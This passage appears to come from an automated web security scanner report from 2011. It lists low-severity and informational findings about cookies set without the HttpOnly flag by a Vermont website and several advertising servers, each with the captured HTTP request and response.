Location: http://demo.ods.valtira.com/GWO
Content-Length: 0
Content-Type: text/plain

6.20. http://www.vermontopia.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vermontopia.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.vermontopia.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:28:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: PHPSESSID=6678b376dbff5b3ae1448508f8a7d7a3; path=/
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Content-Length: 31515


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
6.21. http://69.16.184.116/v8u2m5i8/cds/tags2/4-1007209.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://69.16.184.116
Path:   /v8u2m5i8/cds/tags2/4-1007209.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v8u2m5i8/cds/tags2/4-1007209.js?dopvhost=adserving.cpxadroit.com&doppl=f0f24490bd5172a4bd0172a4f811cad0&dopsig=f4b1e5d7ce58e44c636b8da30d073da0 HTTP/1.1
Host: 69.16.184.116
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 17:01:18 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1302209407"
Set-Cookie: doprefurl=%2fv8u2m5i8%2fcds%2ftags2%2f4-1007209.js%3fdopvhost%3dadserving.cpxadroit.com%26doppl%3df0f24490bd5172a4bd0172a4f811cad0%26dopsig%3df4b1e5d7ce58e44c636b8da30d073da0; path=/;
Last-Modified: Thu, 07 Apr 2011 20:50:07 GMT
Cache-Control: max-age=86400
Content-Length: 202
Content-Type: application/javascript
X-HW: 1302541278.cc012d1

document.writeln('<SCRIPT TYPE="text\/javascript" SRC="http:\/\/adserving.cpxinteractive.com\/st?ad_type=ad&ad_size=728x90&section=1836970&referrer=' + encodeURI(window.location.href) + '"><\/SCRIPT>'
...[SNIP]...
6.22. http://a.rfihub.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?apxuid=8663496762294337265&forward= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: g="aABsHUtkw==A-ac0ldxTL_CNwb|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpChvw="; f="aABnVdpdA==AK1302352529AB1AAABLzpChvo="; s="aAC7sFUPw==AE9479AN1294103956000AAABLzpChvo=AE8438AN1275963655000AAABLzpChvo="; a=c369576644441445519; j=c369576644441445519; o=1-DIhc6MPrMFqM; p=1-DIhc6MPrMFqM; r=1302352529146; u="aABnAskUA==AI89bBrQ==AAABLzpCpLs="; e=cd

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a2=8663496762294337265;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: j2=8663496762294337265;Path=/;Domain=.rfihub.com
Set-Cookie: t1=1302352537225;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: u="aABnAunNw==AI89bBrQ==AAABLzpCpoo=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:37 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:37 GMT
Set-Cookie: a=c369576644441445519;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: j=c369576644441445519;Path=/;Domain=.rfihub.com
Content-Type: image/gif
Set-Cookie: o=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: p=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529146;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
6.23. http://a.rfihub.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?id=CAESEPxOsKR978Hu13ThKmL5OJM&cver=1&forward= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: g="aABsHUtkw==A-ac0ldxTL_CNwb|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpChvw="; u="aABnAgfAg==AI89bBrQ==AAABLzpChvs="; f="aABnVdpdA==AK1302352529AB1AAABLzpChvo="; s="aAC7sFUPw==AE9479AN1294103956000AAABLzpChvo=AE8438AN1275963655000AAABLzpChvo="; e=cd; a=c369576644441445519; j=c369576644441445519; o=1-DIhc6MPrMFqM; p=1-DIhc6MPrMFqM; r=1302352529146

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a1=1CAESEPxOsKR978Hu13ThKmL5OJM;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: j1=1CAESEPxOsKR978Hu13ThKmL5OJM;Path=/;Domain=.rfihub.com
Content-Type: image/gif
Content-Length: 42
Set-Cookie: t=1302352533150;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: u="aABnAnSVw==AI89bBrQ==AAABLzpClp4=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:33 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:33 GMT
Set-Cookie: a=c369576644441445519;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: j=c369576644441445519;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: p=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529146;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT

GIF89a.............!.......,........@..D.;
6.24. http://a.rfihub.com/sed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370522&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352522769&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352522793&frm=0&adk=2815960337&ga_vid=983270927.1302352523&ga_sid=1302352523&ga_hid=1867116075&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18963&fu=0&ifi=1&dtd=103&xpc=mxzeQN3016&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aABMFwoTA==A-aAcXzUJ2ZpCiN|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpCh6o=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: u="aABnActyg==AI89bBrQ==AAABLzpCh6k=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: f="aABnVZ4PA==AK1302352529AB1AAABLzpCh6g=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: s="aACqCxNPw==AE9479AN1294103956000AAABLzpCh6g=AE8438AN1275963655000AAABLzpCh6g=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: a=c369576644441445542;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Set-Cookie: j=c369576644441445542;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-qI823taMvmm8;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Set-Cookie: p=1-qI823taMvmm8;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529321;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Content-Length: 2760

<html><body><span id="__rfi" style="height:0px; width:0px"><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529320;click=h
...[SNIP]...
6.25. http://a.rfihub.com/tk.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /tk.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tk.gif?rb=445&re=12387&aa=9530,84152,12352,361230,824,10261,c0ldxTL_CNwb,http%3A%2F%2Frocketfuelinc.com,492,1249,38387,1279,6613&pa=ppre352525508247&id=&ra=3525276570.8074509229045361&ct=1302352527657 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: g="aABsHUtkw==A-ac0ldxTL_CNwb|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpChvw="; u="aABnAgfAg==AI89bBrQ==AAABLzpChvs="; f="aABnVdpdA==AK1302352529AB1AAABLzpChvo="; s="aAC7sFUPw==AE9479AN1294103956000AAABLzpChvo=AE8438AN1275963655000AAABLzpChvo="; e=cd; a=c369576644441445519; j=c369576644441445519; o=1-DIhc6MPrMFqM; p=1-DIhc6MPrMFqM; r=1302352529146

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: u="aABnAm_Fg==AI89bBrQ==AAABLzpCn-0=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:35 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:35 GMT
Content-Type: image/gif
Content-Length: 42
Cache-Control: no-cache

GIF89a.............!.......,........@..D.;
6.26. http://a1.interclick.com/ColDta.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /ColDta.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ColDta.aspx HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/DtCol.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=a53875b5-a877-4a03-ad1a-e28c70299475; ucap=sl=1; FC_51=113861=17621725:1; IFC=n=1&w13741=1&a113861=1&e=634382119927363227; Aqprep_Banner300X250=113861=634381255927393227:13741; Li=1=734237&30=734237; tpd=i20=&e20=1305135081313&i90=&e90=1303147881323&i50=&e50=1305135081318&i100=&e100=1303147881396

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: tpd=e20=1305135081313&e90=1303147881323&e50=1305135081318&e100=1303147881396; domain=.interclick.com; expires=Wed, 11-May-2011 17:33:17 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 11 Apr 2011 17:33:16 GMT

GIF89a.............!.......,...........D..;
6.27. http://a1.interclick.com/getInPageJSProcess.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /getInPageJSProcess.aspx?a=51&b=13741&cid=634302783474292484&isif=t&rurld=tag.admeld.com&sl=true&dvp=http%3A//tag.admeld.com/ad/iframe/3/foxnews/300x250/ros%3Ft%3D1302543075863%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26refer%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html&rurl= HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302543075863&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=a53875b5-a877-4a03-ad1a-e28c70299475

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ucap=sl=1; domain=.a1.interclick.com; expires=Thu, 21-Apr-2011 17:33:13 GMT; path=/
Set-Cookie: FC_51=113861=17621725:1; domain=.a1.interclick.com; expires=Tue, 12-Apr-2011 17:33:13 GMT; path=/
Set-Cookie: IFC=n=1&w13741=1&a113861=1&e=634382119938708309; domain=.a1.interclick.com; expires=Tue, 12-Apr-2011 17:33:13 GMT; path=/
Set-Cookie: Aqprep_Banner300X250=113861=634381255938868325:13741; domain=.a1.interclick.com; expires=Sun, 10-Jul-2011 17:33:13 GMT; path=/
Set-Cookie: Li=1=734237&30=734237; domain=.a1.interclick.com; expires=Wed, 11-May-2011 17:33:13 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 11 Apr 2011 17:33:13 GMT
Content-Length: 4834

document.write(unescape("%3Cscript%20language%3D%22javascript%22%20type%3D%22text/javascript%22%3E%0D%0Afunction%20regNameSpace%28ns%29%7Btry%7Bvar%20nsP%20%3D%20ns.split%28%22.%22%29%3Bvar%20r%20%3D%
...[SNIP]...
6.28. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=4608069584519221037 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
